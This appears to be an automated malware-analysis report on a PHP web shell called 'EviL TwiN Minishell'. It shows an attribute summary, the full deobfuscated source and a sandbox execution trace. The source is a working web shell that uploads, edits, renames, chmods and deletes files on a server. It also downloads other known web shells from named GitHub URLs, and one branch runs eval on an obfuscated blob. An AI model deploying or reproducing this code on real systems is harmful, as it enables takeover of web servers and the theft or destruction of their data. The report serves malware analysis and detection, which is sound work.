PHP Malware Analysis
mini.php, xc.php
md5: a7d474dfc360b9acd4eab837546d60e6
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- EviL TwiN Minishell (Deobfuscated, HTML, Original)
URLs
- https://fonts.googleapis.com/css2?family=Inika& (HTML)
- https://fonts.googleapis.com/css2?family=Inika&display=swap (Deobfuscated, Original)
- https://github.com/eviltwin-dev/eviltwin-minishell (Deobfuscated, HTML, Original)
- https://raw.githubusercontent.com/BOTKNTL/kontol/master/alfatesla.php (Deobfuscated)
- https://raw.githubusercontent.com/BOTKNTL/kontol/master/b374k323.php (Deobfuscated)
- https://raw.githubusercontent.com/BOTKNTL/kontol/master/eviltwin-shell.php (Deobfuscated)
- https://raw.githubusercontent.com/BOTKNTL/kontol/master/indoxploit.php (Deobfuscated)
- https://raw.githubusercontent.com/BOTKNTL/kontol/master/maricoli.php (Deobfuscated)
- https://raw.githubusercontent.com/BOTKNTL/kontol/master/wso425.php (Deobfuscated)
Deobfuscated PHP code
<?php
error_reporting(0);
set_time_limit(0);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo "<!DOCTYPE HTML><html><head><meta name=\"author\" content=\"Evil Twin\"><meta name=\"theme-color\" content=\"#561000\"><meta name=\"robots\" content=\"noindex, nofollow, noarchive\"><link href=\"https://fonts.googleapis.com/css2?family=Inika&display=swap\" rel=\"stylesheet\"><style>body { font-family: \"Inika\", serif; background-color: #561000; color:white;} tr:hover{ background-color: #ADDIFUWANT;}.first{ background-color: #970B00;}table{ border: 1px #FFFFFF solid;}a{color:white;text-decoration: none;}a:hover{color:lime;}input,select,textarea{border: 1px #FFFFFF solid;-moz-border-radius: 5px;-webkit-border-radius:5px;border-radius:5px;}</style><title>EviL TwiN Minishell</title></head><body><center><a href=\"?\"><font size=\"5\">EviL TwiN Mini</font><font size=\"5\" color=\"lime\">\$</font><font size=\"5\">hell</font></a></center><table width=\"730\" border =\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td><font color=\"white\">Path :</font> ";
if (isset($_GET['eviltwin'])) {
$eviltwin = $_GET['eviltwin'];
} else {
$eviltwin = getcwd();
}
$eviltwin = str_replace('\\', '/', $eviltwin);
$eviltwins = explode('/', $eviltwin);
foreach ($eviltwins as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?eviltwin=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?eviltwin=";
for ($i = 0; $i <= $id; $i++) {
echo "{$eviltwins[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$system = php_uname();
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? '<font>ON</font>' : '<font>OFF</font>';
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $eviltwin);
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $eviltwin . '/' . $_FILES['file']['name'])) {
echo "<font color=\"lime\">Upload successfully</font><br />";
} else {
echo "<font color=\"white\">Upload failed</font><br/>";
}
}
echo '<font>Safe Mode : ' . $sm . '</font><br><font>Server IP : ' . $ip . '</font><br><font>System : ' . $system . '</font><br><form enctype="multipart/form-data" method="POST"><font color="white">File Upload :</font> <input type="file" name="file"><input type="submit" value="Go!"></form><form method="post"><font>Shell Creator : </font><select name="eviltwin"><option selected>Select</option><option value="idx">Indoxploit (3)</option><option value="wso">Wso (4.2.5)</option><option value="b374k">B374k (3.2.3)</option><option value="marijuana">Marijuana (1)</option><option value="alfa">Alfa (4)</option><option value="noname">Noname (1)</option><option value="ets">Evil Twin (1.3)</option></select><input type="submit" value="Get!"></form></center>';
if ($_POST['eviltwin'] == 'idx') {
eval /* PHPDeobfuscator eval output */ {
function idx($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
}
if (file_exists('idx.php')) {
echo "<center><font><a href='{$full}/idx.php' target='_blank'>>> IndoXploit Shell <<</a></font></center>";
} else {
if (idx("https://raw.githubusercontent.com/BOTKNTL/kontol/master/indoxploit.php", "idx.php")) {
echo "<center><font><a href='{$full}/idx.php' target='_blank'>>> IndoXploit Shell <<</a></font></center>";
} else {
echo "<center><font>Failed to create IndoXploit Shell :(</font></center>";
}
}
};
} elseif ($_POST['eviltwin'] == 'wso') {
eval /* PHPDeobfuscator eval output */ {
function wso($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
}
if (file_exists('wso.php')) {
echo "<center><font><a href='{$full}/wso.php' target='_blank'>>> WSO Shell <<</a></font></center>";
} else {
if (wso("https://raw.githubusercontent.com/BOTKNTL/kontol/master/wso425.php", "wso.php")) {
echo "<center><font><a href='{$full}/wso.php' target='_blank'>>> WSO Shell <<</a></font></center>";
} else {
echo "<center><font>Failed to create WSO Shell :(</font></center>";
}
}
};
} elseif ($_POST['eviltwin'] == 'b374k') {
eval /* PHPDeobfuscator eval output */ {
function b374k($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
}
if (file_exists('b374k.php')) {
echo "<center><font><a href='{$full}/b374k.php' target='_blank'>>> B374K Shell <<</a></font></center>";
} else {
if (b374k("https://raw.githubusercontent.com/BOTKNTL/kontol/master/b374k323.php", "b374k.php")) {
echo "<center><font><a href='{$full}/b374k.php' target='_blank'>>> B374K Shell <<</a></font></center>";
} else {
echo "<center><font>Failed to create B374K Shell :(</font></center>";
}
}
};
} elseif ($_POST['eviltwin'] == 'marijuana') {
eval /* PHPDeobfuscator eval output */ {
function marijuana($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
}
if (file_exists('marijuana.php')) {
echo "<center><font><a href='{$full}/marijuana.php' target='_blank'>>> MARIJUANA Shell <<</a></font></center>";
} else {
if (marijuana("https://raw.githubusercontent.com/BOTKNTL/kontol/master/maricoli.php", "marijuana.php")) {
echo "<center><font><a href='{$full}/marijuana.php' target='_blank'>>> MARIJUANA Shell <<</a></font></center>";
} else {
echo "<center><font>Failed to create MARIJUANA Shell :(</font></center>";
}
}
};
} elseif ($_POST['eviltwin'] == 'alfa') {
eval /* PHPDeobfuscator eval output */ {
function alfa($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
}
if (file_exists('alfa.php')) {
echo "<center><font><a href='{$full}/alfa.php' target='_blank'>>> Alfa Shell <<</a></font></center>";
} else {
if (alfa("https://raw.githubusercontent.com/BOTKNTL/kontol/master/alfatesla.php", "alfa.php")) {
echo "<center><font><a href='{$full}/alfa.php' target='_blank'>>> Alfa Shell <<</a></font></center>";
} else {
echo "<center><font>Failed to create Alfa Shell :(</font></center>";
}
}
};
} elseif ($_POST['eviltwin'] == 'noname') {
eval(gzinflate(bsse64_decode('vVLBauMwED2nsP8wmIAdMNG96xjaxYHQ4BbHWejJKNpRLapIRpJpoey/7zh2aAtbaC89GFlv5r15MyPZGxGUNWCs4UdM5r3TKcyVVwt4+XExm81lByuQtkOTDHAK0VO0+HkKiZZCghiNMiokIwozGDGPwXYhoawUfu2r7e1d3dBB6hT9RO71pryq7uvqqtytiyqF4Hr8BK0q6n1Vfpm2222b30W1Wd/fFQNNcu3PPIDZh7z1ZltQS7Ibcx2G3pmxDD6jGJLHyAkS2np8xeR0P7PtoZG69+00yjf/f+lTMpFKI+kqH3wSjytbdm0XL6ZtoWgtRJlAE9DlmbQm5BmH1qFcxXPZa83esCBw94BhFTcHzc1jnOc5lLakMOxa1BqyLGM8z9iowybZ6GQIkAY0ViVj0/OJ2hA6f8mY40/LBxXa/tB7dIL4xF0Ke2TXt/VNWW/ZI2FWsyP3pDm58kPVwVqURq8+o3N339jeu/7+W3fNaRd/IFgQDnnA99KXyQeyw+j+AQ==')));
} elseif ($_POST['eviltwin'] == 'ets') {
eval /* PHPDeobfuscator eval output */ {
function ets($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
}
if (file_exists('ets.php')) {
echo "<center><font><a href='{$full}/ets.php' target='_blank'>>> Evil Twin Shell <<</a></font></center>";
} else {
if (ets("https://raw.githubusercontent.com/BOTKNTL/kontol/master/eviltwin-shell.php", "ets.php")) {
echo "<center><font><a href='{$full}/ets.php' target='_blank'>>> Evil Twin Shell <<</a></font></center>";
} else {
echo "<center><font>Failed to create Evil Twin Shell :(</font></center>";
}
}
};
}
echo "</td></tr>";
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo "</tr></td></table><br />";
echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['eviltwin'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['eviltwin'], $_POST['perm'])) {
echo "<font color=\"lime\">Change permission successfully</font><br/>";
} else {
echo "<font color=\"red\">Change permission failed</font><br />";
}
}
echo '<form method="POST">Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['eviltwin'])), -4) . '" /><input type="hidden" name="eviltwin" value="' . $_POST['eviltwin'] . '"><input type="hidden" name="opt" value="chmod"><input type="submit" value="Go" /></form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['eviltwin'], $eviltwin . '/' . $_POST['newname'])) {
echo "<font color=\"lime\">Rename successfully</font><br/>";
} else {
echo "<font color=\"white\">Rename failed</font><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /><input type="hidden" name="eviltwin" value="' . $_POST['eviltwin'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['eviltwin'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<font color=\"lime\">File edit successfully</font><br/>";
} else {
echo "<font color=\"white\">Failed to edit file</font><br/>";
}
fclose($fp);
}
echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['eviltwin'])) . '</textarea><br /><input type="hidden" name="eviltwin" value="' . $_POST['eviltwin'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>';
}
echo "</center>";
} else {
echo "</table><br/><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['eviltwin'])) {
echo "<font color=\"lime\">Directory deleted successfully</font><br/>";
} else {
echo "<font color=\"red\">Delete directory failed</font><br/>";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['eviltwin'])) {
echo "<font color=\"lime\">File Deleted</font><br/>";
} else {
echo "<font color=\"white\">File Failed to Delete</font><br/>";
}
}
}
echo "</center>";
if (function_exists('opendir')) {
if ($opendir = opendir($eviltwin)) {
while (($readdir = readdir($opendir)) !== false) {
$scandir[] = $readdir;
}
closedir($opendir);
}
sort($scandir);
} else {
$scandir = scandir($eviltwin);
}
echo "<div id=\"content\"><table width=\"730\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"><td><center>NAME</center></td><td><center>SIZE</center></td><td><center>PERMISSION</center></td><td><center>MODIFY</center></td></tr>";
foreach ($scandir as $dir) {
if (!is_dir($eviltwin . '/' . $dir) || $dir == '.' || $dir == '..') {
continue;
}
echo '<tr><td><a href="?eviltwin=' . $eviltwin . '/' . $dir . '">' . $dir . '</a></td><td><center>--</center></td><td><center>';
if (is_writable($eviltwin . '/' . $dir)) {
echo "<font color=\"lime\">";
} elseif (!is_readable($eviltwin . '/' . $dir)) {
echo "<font color=\"white\">";
}
echo perms($eviltwin . '/' . $dir);
if (is_writable($eviltwin . '/' . $dir) || !is_readable($eviltwin . '/' . $dir)) {
echo "</font>";
}
echo '</center></td><td><center><form method="POST" action="?option&eviltwin=' . $eviltwin . '"><select name="opt"><option value="">Select</option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option></select><input type="hidden" name="type" value="dir"><input type="hidden" name="name" value="' . $dir . '"><input type="hidden" name="eviltwin" value="' . $eviltwin . '/' . $dir . '"><input type="submit" value=">"></form></center></td></tr>';
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file($eviltwin . '/' . $file)) {
continue;
}
$size = filesize($eviltwin . '/' . $file) / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo '<tr><td><a href="?filesrc=' . $eviltwin . '/' . $file . '&eviltwin=' . $eviltwin . '">' . $file . '</a></td><td><center>' . $size . '</center></td><td><center>';
if (is_writable($eviltwin . '/' . $file)) {
echo "<font color=\"lime\">";
} elseif (!is_readable($eviltwin . '/' . $file)) {
echo "<font color=\"white\">";
}
echo perms($eviltwin . '/' . $file);
if (is_writable($eviltwin . '/' . $file) || !is_readable($eviltwin . '/' . $file)) {
echo "</font>";
}
echo '</center></td><td><center><form method="POST" action="?option&eviltwin=' . $eviltwin . '"><select name="opt"><option value="">Select</option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="' . $file . '"><input type="hidden" name="eviltwin" value="' . $eviltwin . '/' . $file . '"><input type="submit" value=">"></form></center></td></tr>';
}
echo "</table></div>";
}
echo "<center><br><a href=\"https://github.com/eviltwin-dev/eviltwin-minishell\"><font color=\"white\">© Evil Twin</font></a></center></body></html>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}Execution traces
data/traces/a7d474dfc360b9acd4eab837546d60e6_trace-1676254802.7358.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:20:28.633599]
1 0 1 0.000138 393464
1 3 0 0.000475 465672 {main} 1 /var/www/html/uploads/xc.php 0 0
2 4 0 0.000493 465672 error_reporting 0 /var/www/html/uploads/xc.php 1 1 0
2 4 1 0.000508 465712
2 4 R 22527
2 5 0 0.000521 465672 set_time_limit 0 /var/www/html/uploads/xc.php 1 1 0
2 5 1 0.000536 465736
2 5 R FALSE
2 6 0 0.000549 465704 ini_set 0 /var/www/html/uploads/xc.php 1 2 'log_errors' 0
2 6 1 0.000564 465776
2 6 R '1'
2 7 0 0.000577 465704 ini_set 0 /var/www/html/uploads/xc.php 1 2 'max_execution_time' 0
2 7 1 0.000591 465744
2 7 R '0'
2 8 0 0.000603 465672 ini_set 0 /var/www/html/uploads/xc.php 1 2 'output_buffering' 0
2 8 1 0.000617 465744
2 8 R FALSE
2 9 0 0.000629 465672 ini_set 0 /var/www/html/uploads/xc.php 1 2 'display_errors' 0
2 9 1 0.000643 465744
2 9 R ''
2 10 0 0.000655 465672 get_magic_quotes_gpc 0 /var/www/html/uploads/xc.php 1 0
2 10 1 0.000666 465672
2 10 R FALSE
2 11 0 0.000681 465672 getcwd 0 /var/www/html/uploads/xc.php 1 0
2 11 1 0.000693 465720
2 11 R '/var/www/html/uploads'
1 A /var/www/html/uploads/xc.php 1 $eviltwin = '/var/www/html/uploads'
2 12 0 0.000720 465720 str_replace 0 /var/www/html/uploads/xc.php 1 3 '\\' '/' '/var/www/html/uploads'
2 12 1 0.000735 465816
2 12 R '/var/www/html/uploads'
1 A /var/www/html/uploads/xc.php 1 $eviltwin = '/var/www/html/uploads'
2 13 0 0.000759 465720 explode 0 /var/www/html/uploads/xc.php 1 2 '/' '/var/www/html/uploads'
2 13 1 0.000772 466296
2 13 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/xc.php 1 $eviltwins = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/xc.php 1 $id = 0
1 A /var/www/html/uploads/xc.php 1 $a = TRUE
1 A /var/www/html/uploads/xc.php 1 $id = 1
1 A /var/www/html/uploads/xc.php 1 $i = 0
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $id = 2
1 A /var/www/html/uploads/xc.php 1 $i = 0
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $id = 3
1 A /var/www/html/uploads/xc.php 1 $i = 0
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $id = 4
1 A /var/www/html/uploads/xc.php 1 $i = 0
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
1 A /var/www/html/uploads/xc.php 1 $i++
2 14 0 0.001000 466224 gethostbyname 0 /var/www/html/uploads/xc.php 1 1 'localhost'
2 14 1 0.001037 466304
2 14 R '127.0.0.1'
1 A /var/www/html/uploads/xc.php 1 $ip = '127.0.0.1'
2 15 0 0.001062 466264 php_uname 0 /var/www/html/uploads/xc.php 1 0
2 15 1 0.001076 466376
2 15 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/xc.php 1 $system = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 16 0 0.001111 466376 strtolower 0 /var/www/html/uploads/xc.php 1 1 'safe_mode'
2 16 1 0.001124 466408
2 16 R 'safe_mode'
2 17 0 0.001137 466376 ini_get 0 /var/www/html/uploads/xc.php 1 1 'safe_mode'
2 17 1 0.001150 466408
2 17 R FALSE
1 A /var/www/html/uploads/xc.php 1 $sm = '<font>OFF</font>'
2 18 0 0.001175 466376 str_replace 0 /var/www/html/uploads/xc.php 1 3 '/var/www/html' '' '/var/www/html/uploads'
2 18 1 0.001190 466512
2 18 R '/uploads'
1 A /var/www/html/uploads/xc.php 1 $full = '/uploads'
2 19 0 0.001221 466416 function_exists 0 /var/www/html/uploads/xc.php 1 1 'opendir'
2 19 1 0.001239 466456
2 19 R TRUE
2 20 0 0.001253 466416 opendir 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads'
2 20 1 0.001271 466808
2 20 R resource(4) of type (stream)
1 A /var/www/html/uploads/xc.php 1 $opendir = resource(4) of type (stream)
2 21 0 0.001297 466776 readdir 0 /var/www/html/uploads/xc.php 1 1 resource(4) of type (stream)
2 21 1 0.001318 466848
2 21 R 'xc.php'
1 A /var/www/html/uploads/xc.php 1 $readdir = 'xc.php'
1 A /var/www/html/uploads/xc.php 1 $scandir[] = 'xc.php'
2 22 0 0.001352 467184 readdir 0 /var/www/html/uploads/xc.php 1 1 resource(4) of type (stream)
2 22 1 0.001365 467256
2 22 R '..'
1 A /var/www/html/uploads/xc.php 1 $readdir = '..'
1 A /var/www/html/uploads/xc.php 1 $scandir[] = '..'
2 23 0 0.001397 467216 readdir 0 /var/www/html/uploads/xc.php 1 1 resource(4) of type (stream)
2 23 1 0.001409 467288
2 23 R '.'
1 A /var/www/html/uploads/xc.php 1 $readdir = '.'
1 A /var/www/html/uploads/xc.php 1 $scandir[] = '.'
2 24 0 0.001440 467248 readdir 0 /var/www/html/uploads/xc.php 1 1 resource(4) of type (stream)
2 24 1 0.001453 467328
2 24 R 'prepend.php'
1 A /var/www/html/uploads/xc.php 1 $readdir = 'prepend.php'
1 A /var/www/html/uploads/xc.php 1 $scandir[] = 'prepend.php'
2 25 0 0.001487 467288 readdir 0 /var/www/html/uploads/xc.php 1 1 resource(4) of type (stream)
2 25 1 0.001499 467360
2 25 R 'data'
1 A /var/www/html/uploads/xc.php 1 $readdir = 'data'
1 A /var/www/html/uploads/xc.php 1 $scandir[] = 'data'
2 26 0 0.001531 467320 readdir 0 /var/www/html/uploads/xc.php 1 1 resource(4) of type (stream)
2 26 1 0.001543 467400
2 26 R '.htaccess'
1 A /var/www/html/uploads/xc.php 1 $readdir = '.htaccess'
1 A /var/www/html/uploads/xc.php 1 $scandir[] = '.htaccess'
2 27 0 0.001575 467360 readdir 0 /var/www/html/uploads/xc.php 1 1 resource(4) of type (stream)
2 27 1 0.001588 467400
2 27 R FALSE
1 A /var/www/html/uploads/xc.php 1 $readdir = FALSE
2 28 0 0.001611 467360 closedir 0 /var/www/html/uploads/xc.php 1 1 resource(4) of type (stream)
2 28 1 0.001626 467176
2 28 R NULL
2 29 0 0.001639 467160 sort 0 /var/www/html/uploads/xc.php 1 1 [0 => 'xc.php', 1 => '..', 2 => '.', 3 => 'prepend.php', 4 => 'data', 5 => '.htaccess']
2 29 1 0.001658 467192
2 29 R TRUE
2 30 0 0.001671 467208 is_dir 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.'
2 30 1 0.001686 467272
2 30 R TRUE
2 31 0 0.001699 467240 is_dir 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/..'
2 31 1 0.001712 467288
2 31 R TRUE
2 32 0 0.001725 467248 is_dir 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.001738 467288
2 32 R FALSE
2 33 0 0.001751 467248 is_dir 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/data'
2 33 1 0.001764 467288
2 33 R TRUE
2 34 0 0.001777 467248 is_writable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/data'
2 34 1 0.001792 467288
2 34 R TRUE
2 35 0 0.001806 467248 perms 1 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/data'
3 36 0 0.001818 467248 fileperms 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/data'
3 36 1 0.001830 467288
3 36 R 16895
2 A /var/www/html/uploads/xc.php 1 $perms = 16895
2 A /var/www/html/uploads/xc.php 1 $info = 'd'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= 'w'
2 A /var/www/html/uploads/xc.php 1 $info .= 'x'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= 'w'
2 A /var/www/html/uploads/xc.php 1 $info .= 'x'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= 'w'
2 A /var/www/html/uploads/xc.php 1 $info .= 'x'
2 35 1 0.001944 467288
2 35 R 'drwxrwxrwx'
2 37 0 0.001958 467248 is_writable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/data'
2 37 1 0.002002 467288
2 37 R TRUE
2 38 0 0.002022 467256 is_dir 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/prepend.php'
2 38 1 0.002037 467304
2 38 R FALSE
2 39 0 0.002050 467256 is_dir 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/xc.php'
2 39 1 0.002063 467288
2 39 R FALSE
2 40 0 0.002077 467240 is_file 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.'
2 40 1 0.002091 467272
2 40 R FALSE
2 41 0 0.002104 467240 is_file 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/..'
2 41 1 0.002117 467288
2 41 R FALSE
2 42 0 0.002129 467248 is_file 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
2 42 1 0.002150 467288
2 42 R TRUE
2 43 0 0.002163 467248 filesize 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
2 43 1 0.002174 467288
2 43 R 64
1 A /var/www/html/uploads/xc.php 1 $size = 0.0625
2 44 0 0.002198 467192 round 0 /var/www/html/uploads/xc.php 1 2 0.0625 3
2 44 1 0.002211 467264
2 44 R 0.063
1 A /var/www/html/uploads/xc.php 1 $size = 0.063
1 A /var/www/html/uploads/xc.php 1 $size = '0.063 KB'
2 45 0 0.002247 467288 is_writable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
2 45 1 0.002262 467328
2 45 R FALSE
2 46 0 0.002275 467288 is_readable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
2 46 1 0.002290 467328
2 46 R TRUE
2 47 0 0.002303 467288 perms 1 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
3 48 0 0.002316 467288 fileperms 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
3 48 1 0.002329 467328
3 48 R 33188
2 A /var/www/html/uploads/xc.php 1 $perms = 33188
2 A /var/www/html/uploads/xc.php 1 $info = '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= 'w'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= 'r'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 A /var/www/html/uploads/xc.php 1 $info .= '-'
2 47 1 0.002438 467328
2 47 R '-rw-r--r--'
2 49 0 0.002452 467288 is_writable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
2 49 1 0.002467 467328
2 49 R FALSE
2 50 0 0.002480 467288 is_readable 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/.htaccess'
2 50 1 0.002495 467328
2 50 R TRUE
2 51 0 0.002509 467288 is_file 0 /var/www/html/uploads/xc.php 1 1 '/var/www/html/uploads/data'
2 51 1 0.002531 467328
2 51 R FALSE
